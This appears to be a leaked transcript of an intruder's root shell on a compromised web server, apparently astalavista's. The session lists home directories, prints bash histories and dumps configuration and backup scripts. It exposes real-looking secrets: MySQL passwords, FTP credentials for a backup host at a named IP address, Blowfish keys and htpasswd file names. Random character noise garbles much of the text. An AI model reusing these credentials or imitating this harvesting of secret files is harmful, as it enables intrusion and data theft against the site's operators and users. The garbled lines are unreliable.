sh-3.2# cat /etc/motd1 L: k8 r9 X5 t. P
#####################################################) u* b$ r' v: E4 e4 i
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
. ^( M" s# ~ V# |__| [__ | |__| | |__| | | | [__ | |__| #
% J% g! I6 |5 x& o+ \) N# | | ___] | | | |___ | | \/ | ___] | | | #
* s( Y, M& J% _/ r8 e# #5 v# m0 @0 o$ r% B3 T
#####################################################8 O X1 C3 {" \. r. c( x
# #& p- `. Q7 h8 z: Z- K' p! Q) r
# Admin Contact - 链接标记support@secureservertech.com #1 b2 l5 o, t: y( u; \
# #
/ X, O& J: [. h; i# Available ShortCuts #
. m4 i; q. y' k+ l: F' R% C: C# #* u) p0 k. q! h2 Z/ l) v
# nst - list active connections #
. L) C8 @! c' R: [% m8 E! a( Y3 u2 D# ddos - shows how many times each ip is connected #% d/ I* T) v N* Z
# ltr - restart the webserver #
8 s) x, Y6 z' J& u4 A5 N5 E4 I5 }# phpc - edit the php config file #& ^& H% e! f5 y
# htc - edit the webserver configuration file #
* P, v& ]. L0 b, B: C8 f# up - uptime #
* [2 w7 y2 G, T6 K8 q N8 ]# etd - edit the motd of the day file #; X! H! p/ Z3 R1 J' \& H
# htr - start and restart apache if needed #( ~* l5 v" p. Y9 W5 ?, y
# syng - shows active SYN_RECV connections #5 A! f% w! V. Z( B+ d- b# l- b
# synd - syn flood blocker - “synd -h” for usage #
" }: v# ^- {! B3 P7 [ |1 Q9 Z, A#####################################################) _8 B; _/ O0 c$ V* o* X- t
# NOTES: #
3 v7 v! N8 t k& w8 o& r# Last Upgrade - 12-08-2008 by JF #
. ^7 ?4 p, p. H0 m# My.cnf/Mysql Optimization - 1-28-09 #
, l T7 y6 A3 Z2 [& {1 b. I# Z# #. l1 u" U; K5 C* q$ Z
# #1 r9 Y. B% E3 N: |; I8 }+ i
# #
$ F; M% I1 `7 G& z: E1 R7 A0 {#####################################################% e, o" q* I/ ]$ V) B4 a% j
' ^ B+ |/ |) K! c- Vsh-3.2# lastlog | grep -v Never
( Z" M' P8 h$ _ `Username Port From Latest
6 c2 l7 w: \! D( a3 ]root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
: l$ }9 `6 o- K9 Y: ladmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008$ K% W+ ]) p# g; f4 g) l2 p% k3 e
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009. m, R, D/ p3 N3 t& b
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
/ J; V. |1 m* S* X/ X/ [0 E% ?: M& A, l; t( V
sh-3.2# ls -la' r2 S7 b" F- l4 V W7 T, m8 ?
total 4533760 H: w) i' m; M% }3 l0 l
drwxr-x— 15 root root 4096 Jun 4 08:40 .
, _0 }5 D! F% K& M) G4 qdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ... ]7 K/ b8 i5 m5 N4 K' {8 u
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip! h+ Z7 y; w2 s: f- F# r7 a
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
9 N8 }2 _2 b3 H. h" W4 m-rw——- 1 root root 16836 Jun 4 07:21 .bash_history8 O2 c$ k" m% {. P. R9 A( [! d/ s
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout F# o/ x. k0 m# x6 Y7 I$ q
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
' {6 y. e" Z" V) y-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
3 o& a/ j! M5 c-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
2 Q; k5 e7 K5 \& u-rw-r–r– 1 root root 1327 Nov 29 2007 cert; f5 X( _% f( X0 B- _
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql: S. j/ S( m6 G _
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan: w( T" N$ M$ Y& @2 ]( {
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc) [" l; b, h2 P; {2 t! \ n
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql, x9 P; e0 ~9 q8 M6 f
drwx—— 2 root root 4096 Oct 28 2007 .elinks/ H; m7 T9 q2 C8 M2 ~
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1# I6 I: V1 H' T
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz21 j2 ]" o" o6 ^, ?7 F8 ^8 H! T
-rw——- 1 root root 0 Apr 16 13:19 .history3 F7 i. y1 g% y @7 p$ g
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
: ]8 c) R. T3 ^& {; j-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
& A5 ?# F5 G- ]2 s( I-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
! V1 y$ ]* S( X! ~-rw——- 1 root root 35 Jun 2 14:23 .lesshst3 g- b4 `! V( s8 q
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp: q( W$ b8 [" \" q) J ^+ Q [0 Z5 F9 K
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
/ D" c+ v5 U' u-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz- H8 g9 x$ U5 J
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
1 o ^5 Z3 s+ ?. ?; V-rwx—— 1 root root 760 Sep 18 2008 lp
) s3 T4 C4 F2 c: Wdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1, c; _! a& h6 ^
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz8 \- [% W. Q6 C9 K; U
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1$ o8 G4 I" D' k0 N6 `/ R+ n! q
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9, R7 G) K2 B! L( o% ` {# ^. Y% @
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
1 {: u& T, T% w' g- M0 c3 A1 \4 Zdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.33 U6 Z, r; w3 v& ^3 z" Z
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
- u1 K; U7 H7 {% a5 G ?4 p-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh; r+ I. C% f- {' j) D
-rw——- 1 root root 41 Oct 19 2007 .my.cnf0 D1 L) I) S0 j& {* p, r
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history9 G1 @/ a2 l) s* C$ \
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport2 [: m" p+ u6 ~3 H- v
-rw——- 1 root root 41 May 20 2008 .mytop
+ O9 A0 T8 X d: q& cdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
. F/ z' t- U6 v" k* X3 a( s-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz; V# \ F% y4 K% X, H" |5 b* m4 r
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
( c$ ^- C& H% E4 `1 _1 @7 o2 t @' F-rw——- 1 root root 1462 Sep 21 2007 opt.php
2 e3 G9 P" C5 t-rw-r–r– 1 root root 3371 Sep 22 2007 p
% a7 o E% w4 `% |-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2% W! q- J- S' y! B4 `( S& C# x$ o
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
) c. k7 v1 B$ A2 I; Z-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
, P [0 O5 U4 C9 J7 \* N7 u-rw-r–r– 1 root root 887 Nov 28 2007 server.key1 ?) g. p8 M& n
drwx—— 2 root root 4096 Oct 10 2008 .ssh2 T& y* |6 I9 O8 l9 l B' M, R
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat" L3 n J$ [# r. M7 F- D2 C( q3 I
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
! q" T% G: G6 W- T! j9 _) b8 e-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
6 q, | o3 a) ?-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
! W: Y2 d" F- v" ?drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
0 \6 f& ^1 l3 G0 C" A-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
& \$ j+ D5 U8 [" k: {drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
, p) X# |, @$ k8 {! s-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
: H( Q4 Q8 O% [( J* K! L! `% }: e-rw——- 1 root root 12997 May 16 2008 .viminfo& @$ ~& r$ r, v( k8 p
, b! x! s( G( m6 |4 H. Y
sh-3.2# cat .bash_history
/ ]) V4 k8 }& U/ w% G' F9 A[snip]
* e, |3 U9 C5 x2 p$ E7 H1 Swget cp4sst.com/sstlinux.tar.gz4 c9 o( P# E. |3 G
tar zxvf sstlinux.tar.gz
$ H$ g* h) O9 Y3 xcd linux-2.6.27.10
( m6 y# B' D$ L% I3 g, hsh install.sh- n, G4 o: ?5 n5 D
make bzImage ; make modules ; make modules_install ; make install
% }( p& c+ W$ R* L7 amake clean. D! j* x- o' J# j* f
service mysqld restart
* H2 l( U5 ^, H) S[snip]& o& |: m+ h1 u9 s" Z( y6 l! R! w
cd /usr/sbin/
& N0 P$ C. ^ g( t! l7 Z1 f8 Achmod 4777 traceroute' v" C, R. n3 `/ g. W8 E
chmod 4777 ping
0 `, d! G, P( L; @6 c2 e7 atraceroute -I 链接标记[url]www.astalavista.ch[/url]. h" U3 N# l( B, L5 K
[snip]/ G) P/ i/ i9 p( V D) M. y7 s* H
vi /etc/csf/csf.conf$ L( b! K- ?" z+ @
traceroute google.ch2 V9 c' @+ R+ P" G+ a8 ~
service csf restart
/ s% q+ S. r& f! t6 s, z) U5 Ztracert google.ch; \, J; m! z$ Z% X
service csf restart
' B3 O6 \% m1 J$ E; T$ i- z5 i: ytraceroute 链接标记[url]www.google.ch[/url]4 B/ n3 ^( S3 i) n4 m; g$ n" w
tracert 链接标记[url]www.google.ch[/url] Q, ~9 C# M, C' u9 j8 S3 Q7 Y; o7 O' q
traceroute 链接标记[url]www.google.ch[/url]$ P- _2 \' m$ U# d2 {0 r
locate traceroute
: H( B, I! ~& \0 E* M: f% ?$ o# xchown 4755 /bin/traceroute
3 _+ e7 ^/ H* N4 {0 `/ Lchown 4777 /bin/traceroute
$ Z8 z0 H. H- s( X ?" e" C) Rlocate ping
9 t: Y8 V3 _, D5 u$ n: `2 Wchown 4755 /bin/ping; ?* n- _, T {4 k% T T
chown 4777 /bin/ping
) K9 H6 E& i9 ncd /bin/& F" @2 ~0 R# O5 C
ls -ali | grep ping
- c: R# L [$ z- N3 t" v; Zchown root ping! a2 f$ g* k9 e7 `4 G. h
chmod 4755 ping
, ?8 U; c2 B0 n5 Q& [; {ls -ali | grep traceroute9 p$ y. S; ~) z% x: [
chown root traceroute1 |- f# L; \% m
chmod 4755 traceroute
9 s& p8 K3 ]5 [5 D0 m- hls -ali | grep traceroute
8 e9 c/ N) E: F) j: Utraceroute -I 链接标记[url]www.google.ch[/url]
# l+ C; O5 D' b3 r+ g6 u" W6 t( Xtraceroute 链接标记[url]www.google.ch[/url]/ t. J6 K6 g# @- y
whois pmsantos.ch: i5 F, j1 j# G4 {+ F( P
[snip]
7 j& L6 P" B7 G9 M: bmysql -h com_contrexx2_live < /root/defaultp_ports.sql6 _2 }3 d2 h6 J# \7 D5 m d: }
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql0 k# l! {' Y. v1 r6 c k
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
1 p+ E! z9 B {, Gmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql- A: z: Q( z `! D
top8 a. e+ S5 J1 F0 R f% K
ping ssth.ch6 w9 b. v" {! C
ping asdlkfaljgasd???ljg???lasj.ch E1 ~" X/ ?7 S) f3 Q
ping asdlkfaljgasdlasj.ch
% c7 R. |# n6 a0 ?5 M/ w! ^ping 链接标记[url]www.ssth.ch[/url]* n E! X2 K! ~1 W! V
ping ssth.ch
) T, I, e4 n% p) Vnslookup 链接标记[url]www.google.ch[/url]) C, i) }: L( { ~2 z7 G8 I2 `
nslookup 链接标记[url]www.ssth.ch[/url]
m* ?3 p a8 X/ e6 K: b% uman nslookup
: _' R: Q% L( V% e Cping 链接标记[url]www.google.ch[/url]( \, l4 y9 x; f& T+ M1 z- H$ T
nslookup 链接标记[url]www.google.ch[/url]
: `+ W+ ]' y! a/ M/ E% W, P! }nslookup 链接标记[url]www.google.ch[/url]8 k1 `+ O: k& P) [( Y3 N
nslookup salfjasdlf.ch
7 [4 M% D9 O1 }, x3 |# w[snip]! J: y8 {6 S& |$ i, Q8 m
openssl passwd -1 sadf
! ~0 z! s5 n" Gopenssl passwd -1 5cZNHstdTy9 R- A$ d: y2 w
mysql
) R! N9 g" E+ g: U* n/ `; W% wmysql
6 i+ \# B3 [2 Jlocate proftp
9 X# q- E" s6 fvi /etc/proftpd.passwd" z. D- I/ p) D) v+ C
service proftpd restart8 W4 z& m; c6 j- ~
locate proftpd.conf; e* Q: @7 F6 E5 K$ g+ ~6 I/ D
vi /etc/proftpd.conf
1 a% {" U8 q* w( ?vi /etc/proftpd.passwd% S" F8 G' Q8 \/ F, @2 B) l& R7 m
service proftpd restart
. \- @' U( |: I[snip]8 @8 j+ }& O+ V ~9 Q
/bin/sh /home/com/backup_system/backup.sh
9 |/ g/ N+ t, h2 W! htar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
& c& ~7 K, _: {4 P: W5 imysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql# w8 A6 O" ?* [% _
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql# s" P. t1 e8 b9 z0 p: b& Z
ls -ali9 f) ^. }, w4 _) g
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql- L. t+ ]) |, l5 d
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql2 P* a$ {( o8 y7 y7 a
crontab -l
- j8 H6 c6 N9 I0 {3 N' z2 ecrontab -l
& P, }$ g5 E) l3 J" Mphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
8 h0 t( v4 A$ [/home/com/public_html/modifications/cronjobs/exploits.sh
4 W: @3 S. @8 j- L- @. `wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]" T; [/ ?' O x1 |: @- g
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
) c" O" _4 O, V: I4 p9 e, H' gcd lsws-4.0.31 B" K4 i: V% k4 ~- `
sh install.sh
7 N1 x: _: }( v, ^% O0 auptime
) ?+ l& ^+ {3 r0 mhdparm -tt /dev/sda, i$ ]& A0 M* u/ j, ~8 u
iostat9 \* z4 v5 w2 H; A& W# D4 _' s
yum install iostat$ [/ |% T# a" J& L m
iostat# |8 w3 ]) B* ^2 {! K! ]/ @
whereis iostat3 w% E( W4 K' F3 y' F; {5 T
yjm clean all3 i- B: c+ J& ^+ d
yum clean all ; yum -y update& J9 e- h$ R' P4 @$ P
iostat
& o: m8 b7 Z" W9 |yum install systat
$ J: b3 \8 |, \rpm -qa | grep iostat
+ K+ B$ Z, T2 ~rpm -qa | grep sysstat( E" k! [) F" ?9 ^
rpm -qa | grep systat& r9 A; s0 `3 j
dmesg -c
Z" ~+ U# c+ i" o) U2 M2 C# Psysctl -p
& G5 J8 ?: e7 Ouname -r
$ M. \$ p5 }, ?8 h. qcd /usr/src
% f8 p" T) \! @$ dwget nix101.com/kernels/sstlinux.tar.gz3 D* @! W- c& C# E8 N5 e
shutdown -r now
9 I& }: i9 I V/ a: jnano -w /boot/grub/grub.conf4 H/ w% n+ f* ^# W. e+ _2 H! a
7 l. O4 g( Q$ o+ v. d- C" o
sh-3.2# cat .my.cnf
* [/ `" ?) H; x x; f7 e; v[client]8 g6 `% b0 T3 L; p" j( t8 g# p
user=da_admin
4 U `/ @6 S$ l/ @3 o J9 P! Lpassword=X9dctmRH
) c* B5 O- m% c1 u2 I& p/ P( ^ ^" Y9 Z# {" H3 U* k) |+ S
sh-3.2# cat /home/com/backup_system/backup.sh* g3 V( U9 d7 }& t- Q1 L1 b
#!/bin/sh) U# x# P7 H/ ~( M5 W$ t
#####################################################################; k0 \. E3 y4 @% l x1 f
# #5 G9 s7 h, d/ k4 S
# incremental backup for astalavista.com #
- @2 t6 u3 T; }+ v' Q) i& m2 v# #0 X+ }7 C8 k/ p, G) ], v! M
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #- g" B9 X& d! m2 L& P& [: A
# #
- v, m5 _) x9 F" U#####################################################################" p+ Z+ q. V8 |% Y+ h
[snip]
7 L3 W( H' c: p+ oPROG_DIR=”/home/com/backup_system”;
) i* y6 r& ?( M0 g# e- ?" `BACKUP_DIR=”/home/com/backups”;! n# c" H9 ^1 a( O
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
2 m' ]/ p0 H3 o# ftp for synology backup server
' c9 @0 S* Y" e+ Q5 IFTP_HOST=”212.254.194.163″;' Q% f- \- A1 \8 Y1 h! ?6 E0 {0 W; f
FTP_PORT=”21″;
2 a* D6 m' Y& G9 AFTP_USER=”astalavista.com”;4 d4 R8 X' U4 `. c. I% H
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
$ O6 }2 z5 i0 N0 M: @$ O6 fFTP_DIR=”/astalavista.com”;2 T$ A1 s' ?' v, {8 u/ ]' k
# database# p6 W( g% q9 {& h+ m) l, n; t
DB_HOST=”localhost”;
( B; Z0 P: A+ t8 C% sDB_USER=”contrexxuser2″;' o4 f0 M0 a) X6 u
DB_PASS=”0fEYNZgXz1pKe”;+ R4 _( V$ l( ?( [
DB_DATABASE1=”com_contrexx2_live”;5 B/ `! j. r. |: V8 t9 J
DB_DATABASE2=”com_contrexx2″;
- f) N+ p+ G% L[snip]
L* X% W% ?; R( q$ k( z2 o3 cftp -in $FTP_HOST $FTP_PORT <<EOF! v2 Z! A ]$ R1 E/ Q" O
quote USER $FTP_USER% g9 V" D1 e2 d; p( o, N
quote PASS $FTP_PASS: V5 C: K0 u- E5 o! e
cd $FTP_DIR
8 @% y, Y, c X% Z5 r, n& H( s# Bput $DB_FULLNAME-SQL_Dump.tar
2 s- p6 N" D5 F1 @! z+ \put $BACKUP_FULLNAME-Public_HTML.tar) Z2 B- q1 l# n! f6 p, U
close
9 C- r* r5 E Q5 i( Cbye
S* t. q: R$ l; Z1 ]2 ]( W" l4 g$ H7 nEOF1 m' ` \ W5 m7 l* s, Y* z0 u( @
, r3 K) W1 c) W: A$ `2 N% U# P3 Y7 }, d
sh-3.2# cd /home
v y) V* I5 I& s/ |sh-3.2# ls -la. q6 y2 W+ q( B; j8 J
total 120
2 S. v8 j3 o P" cdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .. h8 U' A( b+ U# Z7 b
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
# M( \: ~" M* H' C/ f @3 i- Z$ U9 ddrwx–x–x 9 admin admin 4096 Nov 28 2007 admin9 E) p+ h' L$ X7 [% e6 w# T: @7 H
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group( ?$ A' d" R$ m/ E2 D* N
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
P4 O+ _& o8 ~! y' A. @, Edrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
+ K# t5 O. G n/ e9 Ydrwxr-xr-x 2 root root 4096 Jul 29 2008 backup' l, z# u( o7 u$ t
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161$ d8 b" _* w8 H6 n
drwx–x–x 10 com com 4096 Apr 28 12:40 com
" e0 O$ q0 l- S5 z: bdrwxr-xr-x 2 root root 4096 May 17 2007 ftp& b! s! B2 r- z3 S9 Q
drwx—— 3 jon jon 4096 Sep 21 2007 jon
* t+ U. u' p/ _+ @! odrwx—— 2 root root 16384 Sep 11 2007 lost+found y p0 V. |. B6 F) }& M9 e
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
5 l' ^, B; Q3 ddrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
0 K+ W" k; q4 g$ R$ Hdrwx—— 2 jon jon 4096 Sep 15 2007 test5 E1 X5 u& f6 c: w0 k( J# R% k
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
8 y( J; T6 U5 Q$ G9 C
+ ^+ |$ c5 r9 ]5 e- ssh-3.2# cd admin
9 Z% x( E R% c5 zsh-3.2# ls -la
0 y% ?$ ?3 {; a: h* e# mtotal 1735896
. i# Z5 Y2 b4 z9 I+ ]drwx–x–x 9 admin admin 4096 Nov 28 2007 .% S# K* m3 E) @" |3 M$ u3 l2 H
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
) F4 u: z( U& c6 `2 p0 D* Ldrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
. T; H" V: T2 k; vdrwx—— 2 admin admin 4096 Sep 28 2007 backups: I S9 ]" A0 S0 l- v
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history( D r/ |* v) V$ g+ ]7 R# z
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout7 M5 ]$ S+ ^. g& E5 y
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
: b4 G* {1 \$ B! [7 z-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
- V( t1 a' n9 N3 bdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
. R7 V, |6 ~7 u7 h: |1 `9 Tdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains. f! M z5 C1 K" M; ^
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap$ C/ P& H4 d. p
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
# J7 `" T, x$ I, |drwx—— 2 admin admin 4096 Sep 21 2007 mail1 n/ V7 \ |* U2 R2 s1 t' T
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
4 k# Z/ B8 O4 O8 [# P-rw-r–r– 1 root root 887 Nov 28 2007 server.key/ S. P Z9 Q. Q% a1 c
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow0 \2 {% Q F7 M. n# g* u
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
, s9 O$ U/ S; y' U( g" U# B$ Fdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
3 Z) a5 H M$ p5 A! C
) V5 |, j7 f8 L" F% J6 \sh-3.2# ... j" a2 k5 e3 L9 c1 u
sh-3.2# cd jon$ J3 E/ x) J* [2 A. D
sh-3.2# ls -la
; @5 y% w* J" i5 atotal 366 H, l9 t3 t+ h9 E! }
drwx—— 3 jon jon 4096 Sep 21 2007 .2 y8 I2 @8 b: O7 [* r- ^+ z
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..: N' `8 `3 z6 U' L4 }) L B) z$ l
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
$ n# Q/ n8 l- l+ J/ f. q& }. m-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout( v; Y- `) L+ Q1 p
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile$ \/ _: B2 X0 N
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc m# ^3 t9 o, D, ^9 E) u* O
-rw-r–r– 1 root root 24 Sep 21 2007 info.php9 b J; a7 x. |( v$ B. d8 V, K
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
& c: h. i" [2 k0 t; c# _* G0 Y9 \! u) p! Z( t: K7 H0 l9 n- p
sh-3.2# cd ..7 i7 z1 p) X0 b" `* N' M
sh-3.2# cd test" }- g5 K+ w0 S% Q
sh-3.2# ls -la! q" f! M( o0 `- {) L
total 48
9 f" g3 N# d2 j7 {& Y' L& N6 Hdrwx—— 2 jon jon 4096 Sep 15 2007 .' G! Z/ q: n. [3 _2 g
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
% H8 n. u* F4 P! g- ^, ~" N% J-rw——- 1 jon jon 79 Sep 21 2007 .bash_history# H7 {) Y6 N* U
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
6 s$ V5 d3 F& ?-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
! }( o7 v% w, w( u-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
- U/ K8 I1 R2 S+ C# Bsh-3.2# cat .bash_history6 }: j Y: {( K6 s8 d4 n: [' p" n/ @3 A
/usr/bin/mysqladmin -u root password PoliuJhytg67
& ?. ~* j# r! y% u: Z2 i& r V6 E1 B" I
sh-3.2# cd ../ A8 [3 Z3 O' `) @
sh-3.2# cd astanet. B, J( [' ]6 `! y" ], _5 ~# X
sh-3.2# ls -la
0 q0 W/ v; H" I V+ ? P6 Btotal 528 Z2 C2 l' ]+ i2 d/ v* d0 Y* C
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .3 o: A& v, ~3 m' D
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ Q6 x2 I8 S" H' w: mdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
' q7 R- M8 B" Q0 }7 P-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history+ o& m5 K' G) e; e+ k* F1 j2 e
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout- v, r0 A: h5 a l2 W
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
8 _% y! g* b; _2 I-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc5 Z" C) e9 O; ?* j* ]8 [
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
/ u3 D; L) u. O# q( Zdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
$ q4 M8 D7 z1 O$ K9 Edrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail% ?4 B2 J# T; _
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history" F+ D4 j3 C6 q' X7 }; q; Z8 T
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
0 H( _8 P+ j- m x5 e2 Z-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
% r0 Y x4 G+ P# h7 k4 t. `& Y; M2 j7 ?# d- b i, d
sh-3.2# cd auth/
% Q/ q1 l* }7 v; ], @sh-3.2# ls -la
0 i9 r4 J+ w7 P+ }total 28
/ h: R) O {9 L& r) \7 U" edrwxr-xr-x 2 root root 4096 Dec 23 16:00 .) T* @) G& y8 c8 F6 U) p5 w# U
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
0 w/ |& E+ k% S* Y+ q) e6 _8 b-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
' G: N" V w K8 X3 k; ^; T: n-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php3 j5 S8 N$ [% N& p. h! D# t
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
/ X3 Z5 w+ m" \) H7 t+ t8 h-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting8 H' U! Y6 K7 |
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd$ _: G9 l2 n4 o/ L, _: \8 h3 }) y
7 v* u# j4 B8 |9 M$ w6 g8 Ssh-3.2# cat hackercontest.config.inc.php" r$ u' f0 c0 ~# @
<?PHP
6 u4 H8 q& h7 ?3 p- J; B# a, e// Variabeln f?r Verbindung zur Datenbank //1 G# E5 F) ]) p+ S Z5 ~
$conxHost = ‘localhost’; // MySQL hostname0 \3 C' J! H! | ^$ ?: ^
$conxUser = ‘hackercontest’; // MySQL user
5 {7 W6 q, b& T4 x. _$conxPassword = ‘K6m@7dUc’; // MySQL password& h7 A) }9 }8 O; {
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish! T/ V* H; V5 m% t+ J
?>
* Y5 s7 l$ T h. S' u# u" O3 {sh-3.2# cat hosting.config.inc.php
/ W* j$ n, I. ^<?PHP
9 a* c, x' @4 C// Variabeln f?r Verbindung zur Datenbank //( |6 m V% [- u7 j6 a, q7 K: X: ^
$conxHost = ‘localhost’; // MySQL hostname( q( Z; o6 y' [% Z; c) D3 {' q
$conxUser = ‘hostinguser’; // MySQL user
2 ~6 {- s; `0 B) D) |* ~$conxPassword = ‘cXvB3981′; // MySQL password. C o/ T. t* y h
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
6 l' p4 ^; x& l5 a9 v# g! X( z?>
- j2 M& \, ]8 C4 k v8 i8 ~; ]
$ {7 @0 K+ x3 L/ gsh-3.2# cd ..
5 V6 K6 O- w6 x4 {4 W3 ish-3.2# cd com# k' V7 e, F; M0 d5 q% Z: C
sh-3.2# ls -la
/ B' ]. u* e8 M& S7 ~9 h7 j! M' D: @1 Ytotal 141208! F6 _* D, `: b* ?& i& ~0 H
